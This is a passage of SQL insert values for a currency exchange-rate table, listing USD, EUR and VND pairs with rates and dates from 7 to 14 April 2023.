(2086, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2087, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-07'),
(2088, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-07'),
(2089, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-07'),
(2090, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2091, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-07'),
(2092, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2093, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-07'),
(2094, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-07'),
(2095, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-07'),
(2096, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2097, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-07'),
(2098, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2099, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-07'),
(2100, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-07'),
(2101, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-07'),
(2102, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2103, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-07'),
(2104, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2105, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-07'),
(2106, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-07'),
(2107, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-07'),
(2108, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2109, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-07'),
(2110, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2111, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-07'),
(2112, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-07'),
(2113, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-07'),
(2114, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2115, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-07'),
(2116, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-07'),
(2117, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-07'),
(2118, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-07'),
(2119, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-08'),
(2120, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2121, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-08'),
(2122, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2123, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-08'),
(2124, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-08'),
(2125, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-08'),
(2126, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2127, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-08'),
(2128, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2129, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-08'),
(2130, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-08'),
(2131, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-08'),
(2132, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2133, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-08'),
(2134, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2135, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-08'),
(2136, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-08'),
(2137, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-08'),
(2138, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2139, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-08'),
(2140, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2141, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-08'),
(2142, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-08'),
(2143, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-08'),
(2144, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2145, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-08'),
(2146, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2147, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-08'),
(2148, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-08'),
(2149, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-08'),
(2150, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2151, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-08'),
(2152, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2153, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-08'),
(2154, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-08'),
(2155, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-08'),
(2156, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2157, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-08'),
(2158, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2159, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-08'),
(2160, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-08'),
(2161, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-08'),
(2162, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2163, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-08'),
(2164, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-08'),
(2165, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-08'),
(2166, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-08'),
(2167, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-09'),
(2168, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2169, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-09'),
(2170, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2171, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-09'),
(2172, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-09'),
(2173, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-09'),
(2174, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2175, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-09'),
(2176, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2177, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-09'),
(2178, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-09'),
(2179, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-09'),
(2180, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2181, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-09'),
(2182, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2183, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-09'),
(2184, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-09'),
(2185, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-09'),
(2186, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2187, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-09'),
(2188, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2189, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-09'),
(2190, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-09'),
(2191, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-09'),
(2192, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2193, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-09'),
(2194, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2195, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-09'),
(2196, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-09'),
(2197, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-09'),
(2198, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2199, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-09'),
(2200, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2201, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-09'),
(2202, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-09'),
(2203, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-09'),
(2204, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2205, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-09'),
(2206, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2207, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-09'),
(2208, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-09'),
(2209, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-09'),
(2210, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2211, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-09'),
(2212, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-09'),
(2213, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-09'),
(2214, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-09'),
(2215, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-10'),
(2216, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2217, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-10'),
(2218, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2219, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-10'),
(2220, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-10'),
(2221, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-10'),
(2222, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2223, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-10'),
(2224, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2225, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-10'),
(2226, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-10'),
(2227, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-10'),
(2228, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2229, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-10'),
(2230, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2231, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-10'),
(2232, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-10'),
(2233, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-10'),
(2234, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2235, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-10'),
(2236, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2237, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-10'),
(2238, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-10'),
(2239, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-10'),
(2240, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2241, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-10'),
(2242, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2243, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-10'),
(2244, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-10'),
(2245, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-10'),
(2246, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2247, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-10'),
(2248, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2249, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-10'),
(2250, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-10'),
(2251, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-10'),
(2252, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2253, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-10'),
(2254, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2255, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-10'),
(2256, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-10'),
(2257, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-10'),
(2258, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2259, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-10'),
(2260, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-10'),
(2261, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-10'),
(2262, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-10'),
(2263, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-11'),
(2264, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2265, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-11'),
(2266, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2267, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-11'),
(2268, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-11'),
(2269, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-11'),
(2270, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2271, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-11'),
(2272, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2273, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-11'),
(2274, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-11'),
(2275, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-11'),
(2276, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2277, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-11'),
(2278, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2279, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-11'),
(2280, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-11'),
(2281, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-11'),
(2282, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2283, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-11'),
(2284, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2285, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-11'),
(2286, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-11'),
(2287, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-11'),
(2288, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2289, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-11'),
(2290, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2291, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-11'),
(2292, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-11'),
(2293, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-11'),
(2294, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2295, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-11'),
(2296, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2297, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-11'),
(2298, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-11'),
(2299, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-11'),
(2300, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2301, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-11'),
(2302, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2303, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-11'),
(2304, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-11'),
(2305, 1, 'USD', 0.000000, 2, 'EUR', 0.916170, '2023-04-11'),
(2306, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2307, 2, 'EUR', 0.000000, 1, 'USD', 1.091500, '2023-04-11'),
(2308, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-11'),
(2309, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-11'),
(2310, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-11'),
(2311, 1, 'USD', 1.000000, 2, 'EUR', 0.916170, '2023-04-12'),
(2312, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2313, 2, 'EUR', 1.000000, 1, 'USD', 1.091500, '2023-04-12'),
(2314, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2315, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-12'),
(2316, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-12'),
(2317, 1, 'USD', 0.000000, 2, 'EUR', 0.917010, '2023-04-12'),
(2318, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2319, 2, 'EUR', 0.000000, 1, 'USD', 1.090500, '2023-04-12'),
(2320, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2321, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-12'),
(2322, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-12'),
(2323, 1, 'USD', 1.000000, 2, 'EUR', 0.917010, '2023-04-12'),
(2324, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2325, 2, 'EUR', 1.000000, 1, 'USD', 1.090500, '2023-04-12'),
(2326, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2327, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-12'),
(2328, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-12'),
(2329, 1, 'USD', 0.000000, 2, 'EUR', 0.917010, '2023-04-12'),
(2330, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2331, 2, 'EUR', 0.000000, 1, 'USD', 1.090500, '2023-04-12'),
(2332, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2333, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-12'),
(2334, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-12'),
(2335, 1, 'USD', 1.000000, 2, 'EUR', 0.917010, '2023-04-12'),
(2336, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2337, 2, 'EUR', 1.000000, 1, 'USD', 1.090500, '2023-04-12'),
(2338, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2339, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-12'),
(2340, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-12'),
(2341, 1, 'USD', 0.000000, 2, 'EUR', 0.917010, '2023-04-12'),
(2342, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2343, 2, 'EUR', 0.000000, 1, 'USD', 1.090500, '2023-04-12'),
(2344, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2345, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-12'),
(2346, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-12'),
(2347, 1, 'USD', 1.000000, 2, 'EUR', 0.917010, '2023-04-12'),
(2348, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2349, 2, 'EUR', 1.000000, 1, 'USD', 1.090500, '2023-04-12'),
(2350, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2351, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-12'),
(2352, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-12'),
(2353, 1, 'USD', 0.000000, 2, 'EUR', 0.917010, '2023-04-12'),
(2354, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2355, 2, 'EUR', 0.000000, 1, 'USD', 1.090500, '2023-04-12'),
(2356, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-12'),
(2357, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-12'),
(2358, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-12'),
(2359, 1, 'USD', 1.000000, 2, 'EUR', 0.917010, '2023-04-13'),
(2360, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2361, 2, 'EUR', 1.000000, 1, 'USD', 1.090500, '2023-04-13'),
(2362, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2363, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-13'),
(2364, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-13'),
(2365, 1, 'USD', 0.000000, 2, 'EUR', 0.915580, '2023-04-13'),
(2366, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2367, 2, 'EUR', 0.000000, 1, 'USD', 1.092200, '2023-04-13'),
(2368, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2369, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-13'),
(2370, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-13'),
(2371, 1, 'USD', 1.000000, 2, 'EUR', 0.915580, '2023-04-13'),
(2372, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2373, 2, 'EUR', 1.000000, 1, 'USD', 1.092200, '2023-04-13'),
(2374, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2375, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-13'),
(2376, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-13'),
(2377, 1, 'USD', 0.000000, 2, 'EUR', 0.915580, '2023-04-13'),
(2378, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2379, 2, 'EUR', 0.000000, 1, 'USD', 1.092200, '2023-04-13'),
(2380, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2381, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-13'),
(2382, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-13'),
(2383, 1, 'USD', 1.000000, 2, 'EUR', 0.915580, '2023-04-13'),
(2384, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2385, 2, 'EUR', 1.000000, 1, 'USD', 1.092200, '2023-04-13'),
(2386, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2387, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-13'),
(2388, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-13'),
(2389, 1, 'USD', 0.000000, 2, 'EUR', 0.915580, '2023-04-13'),
(2390, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2391, 2, 'EUR', 0.000000, 1, 'USD', 1.092200, '2023-04-13'),
(2392, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2393, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-13'),
(2394, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-13'),
(2395, 1, 'USD', 1.000000, 2, 'EUR', 0.915580, '2023-04-13'),
(2396, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2397, 2, 'EUR', 1.000000, 1, 'USD', 1.092200, '2023-04-13'),
(2398, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2399, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-13'),
(2400, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-13'),
(2401, 1, 'USD', 0.000000, 2, 'EUR', 0.915580, '2023-04-13'),
(2402, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2403, 2, 'EUR', 0.000000, 1, 'USD', 1.092200, '2023-04-13'),
(2404, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-13'),
(2405, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-13'),
(2406, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-13'),
(2407, 1, 'USD', 1.000000, 2, 'EUR', 0.915580, '2023-04-14'),
(2408, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2409, 2, 'EUR', 1.000000, 1, 'USD', 1.092200, '2023-04-14'),
(2410, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2411, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-14'),
(2412, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-14'),
(2413, 1, 'USD', 0.000000, 2, 'EUR', 0.907850, '2023-04-14'),
(2414, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2415, 2, 'EUR', 0.000000, 1, 'USD', 1.101500, '2023-04-14'),
(2416, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2417, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-14'),
(2418, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-14'),
(2419, 1, 'USD', 1.000000, 2, 'EUR', 0.907850, '2023-04-14'),
(2420, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2421, 2, 'EUR', 1.000000, 1, 'USD', 1.101500, '2023-04-14'),
(2422, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2423, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-14'),
(2424, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-14'),
(2425, 1, 'USD', 0.000000, 2, 'EUR', 0.907850, '2023-04-14'),
(2426, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2427, 2, 'EUR', 0.000000, 1, 'USD', 1.101500, '2023-04-14'),
(2428, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2429, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-04-14'),
(2430, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-04-14'),
(2431, 1, 'USD', 1.000000, 2, 'EUR', 0.907850, '2023-04-14'),
(2432, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2433, 2, 'EUR', 1.000000, 1, 'USD', 1.101500, '2023-04-14'),
(2434, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-04-14'),
(2435, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-04-14'),
(2436, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-04-14'),
